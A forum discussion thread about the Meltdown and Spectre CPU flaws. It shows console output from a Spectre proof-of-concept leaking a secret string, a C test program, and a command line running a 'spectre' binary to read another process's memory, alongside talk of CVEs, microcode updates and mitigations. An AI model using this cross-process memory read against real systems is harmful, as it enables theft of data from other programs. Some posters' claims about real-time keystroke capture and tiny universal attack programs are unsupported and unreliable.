[DISCUSSION] Meltdown and Spectre

On ubuntu 16.04.3 with linux kernel 4.13.25
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfed08... Success: 0x54='T' score=2
Reading at malicious_x = 0xffffffffffdfed09... Unclear: 0x68='h' score=999 (second best: 0x01 score=763)
Reading at malicious_x = 0xffffffffffdfed0a... Unclear: 0x65='e' score=999 (second best: 0x01 score=799)
Reading at malicious_x = 0xffffffffffdfed0b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=660)
Reading at malicious_x = 0xffffffffffdfed0c... Unclear: 0x4D='M' score=999 (second best: 0x01 score=779)
Reading at malicious_x = 0xffffffffffdfed0d... Unclear: 0x61='a' score=999 (second best: 0x01 score=790)
Reading at malicious_x = 0xffffffffffdfed0e... Unclear: 0x67='g' score=999 (second best: 0x01 score=765)
Reading at malicious_x = 0xffffffffffdfed0f... Unclear: 0x69='i' score=999 (second best: 0x01 score=796)
Reading at malicious_x = 0xffffffffffdfed10... Unclear: 0x63='c' score=999 (second best: 0x01 score=799)
Reading at malicious_x = 0xffffffffffdfed11... Unclear: 0x20=' ' score=999 (second best: 0x01 score=772)
Reading at malicious_x = 0xffffffffffdfed12... Unclear: 0x57='W' score=999 (second best: 0x01 score=782)
Reading at malicious_x = 0xffffffffffdfed13... Unclear: 0x6F='o' score=999 (second best: 0x01 score=836)
Reading at malicious_x = 0xffffffffffdfed14... Unclear: 0x72='r' score=999 (second best: 0x01 score=782)
Reading at malicious_x = 0xffffffffffdfed15... Unclear: 0x64='d' score=999 (second best: 0x01 score=826)
Reading at malicious_x = 0xffffffffffdfed16... Unclear: 0x73='s' score=999 (second best: 0x01 score=759)
Reading at malicious_x = 0xffffffffffdfed17... Unclear: 0x20=' ' score=999 (second best: 0x01 score=799)
Reading at malicious_x = 0xffffffffffdfed18... Unclear: 0x61='a' score=999 (second best: 0x01 score=796)
Reading at malicious_x = 0xffffffffffdfed19... Unclear: 0x72='r' score=999 (second best: 0x01 score=804)
Reading at malicious_x = 0xffffffffffdfed1a... Unclear: 0x65='e' score=999 (second best: 0x01 score=812)
Reading at malicious_x = 0xffffffffffdfed1b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=812)
Reading at malicious_x = 0xffffffffffdfed1c... Unclear: 0x53='S' score=999 (second best: 0x01 score=806)
Reading at malicious_x = 0xffffffffffdfed1d... Unclear: 0x71='q' score=999 (second best: 0x01 score=784)
Reading at malicious_x = 0xffffffffffdfed1e... Unclear: 0x75='u' score=999 (second best: 0x01 score=782)
Reading at malicious_x = 0xffffffffffdfed1f... Unclear: 0x65='e' score=999 (second best: 0x01 score=781)
Reading at malicious_x = 0xffffffffffdfed20... Unclear: 0x61='a' score=999 (second best: 0x01 score=770)
Reading at malicious_x = 0xffffffffffdfed21... Unclear: 0x6D='m' score=999 (second best: 0x01 score=781)
Reading at malicious_x = 0xffffffffffdfed22... Unclear: 0x69='i' score=999 (second best: 0x01 score=809)
Reading at malicious_x = 0xffffffffffdfed23... Unclear: 0x73='s' score=999 (second best: 0x01 score=788)
Reading at malicious_x = 0xffffffffffdfed24... Unclear: 0x68='h' score=999 (second best: 0x01 score=780)
Reading at malicious_x = 0xffffffffffdfed25... Unclear: 0x20=' ' score=999 (second best: 0x01 score=775)
Reading at malicious_x = 0xffffffffffdfed26... Unclear: 0x4F='O' score=999 (second best: 0x01 score=775)
Reading at malicious_x = 0xffffffffffdfed27... Unclear: 0x73='s' score=999 (second best: 0x01 score=788)
Reading at malicious_x = 0xffffffffffdfed28... Unclear: 0x73='s' score=999 (second best: 0x01 score=801)
Reading at malicious_x = 0xffffffffffdfed29... Unclear: 0x69='i' score=999 (second best: 0x01 score=828)
Reading at malicious_x = 0xffffffffffdfed2a... Unclear: 0x66='f' score=999 (second best: 0x01 score=782)
Reading at malicious_x = 0xffffffffffdfed2b... Unclear: 0x72='r' score=999 (second best: 0x01 score=800)
Reading at malicious_x = 0xffffffffffdfed2c... Unclear: 0x61='a' score=999 (second best: 0x01 score=791)
Reading at malicious_x = 0xffffffffffdfed2d... Unclear: 0x67='g' score=999 (second best: 0x01 score=802)
Reading at malicious_x = 0xffffffffffdfed2e... Unclear: 0x65='e' score=999 (second best: 0x01 score=810)
Reading at malicious_x = 0xffffffffffdfed2f... Unclear: 0x2E='.' score=999 (second best: 0x01 score=765)

Original: The Magic Words are Squeamish Ossifrage.
Recovered: The Magic Words are Squeamish Ossifrage.

The output code can be more refined upon seeing Unclear result and mark it as ?
If I get this right: The deciphered text will be T?????????????????
Linux patch is working but Windows didn't get it right.

 

Depends. This is a very complicated mess.

This is case-by-case diagnostic.

You can fool Spectre in some of the Computer hardware.

In AMD you can disable eBPF JIT in order to prevent attack kernel address space.

But Spectre can be Inter-Application (not necessarily targeting the kernel directly).

Spectre Attacks address the core flaw in Processor Design.

You can read from other applications not only from own memory.

For example Create simple program (from github)

Code:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main(int argc,
  const char * * argv) {

  uint8_t *ptr;

  ptr = (int *)malloc(sizeof(uint8_t)); // allocate memory
  ptr[0] = 65;  // 'A'
  ptr[1] = 66; // 'B'

  printf("%d %d - %p", ptr[0], ptr[1], ptr); // print bytes and pointer.
  getchar(); // wait console input
  free(ptr);
  return (0);
}

Run test program

./test
65 66 - 0x1a7c010

Run spectre with agrs in other console.

#
./spectre 0x1a7c010 2

It can in this way be able to read in real-time any character entered in the keyboard.

Programmers can make portable applications for hacking of every piece of computer because flaw in Processor Design

allow this.....

And the size of these malicious applications - not more than 20kb. Like a virus...

I'm not particularly good at predictions. But I can not really see anything good to happen from this flaw

 

You need to login to view this posts content.

 

I saw Intel® Pentium® Processor 75 MHz, 50 MHz FSB

But release note inside archive microcode-20180108.tgz:

No Sandy Bridge and earlier.

 

You need to login to view this posts content.

 

You need to login to view this posts content.

 

You need to login to view this posts content.

 

I've posted updated code. Compile it however you want. I can't find a consistent way to get it working on all hardware.

You might find that the "faster" version gives a better result on older hardware. I can only guess that the compiler is to blame as the version using a little assembly works perfectly on Linux.

 

You need to login to view this posts content.

 

How much does this Intel flaw affect US security? Net security? Think about it.

 

CVE-2017-5753 (bounds check bypass)
CVE-2017-5715 (branch target injection)

Both get patched, but software also needs to be updated to mitigate Spectre.

 

yep you make my day dude congrats for very true words

 

hehe if so wait for "new" VIA cpu's bro

 

You need to login to view this posts content.

 

You need to login to view this posts content.

 

hmm after read all pages of this thread I can conclude that nowaday this is only devices infalible/confiable/secure I think

 

You need to login to view this posts content.

 

The first edition you did was doing perfectly.

New faster

Recovered: ?h? Magi? ??rd? ar? S?ue?m?sh ??s??r??e?

New slower

Recovered: ????????????????????????????????????????

MacOS

 

Same here on Windows. Thought i did any mistake while compiling.

 

You need to login to view this posts content.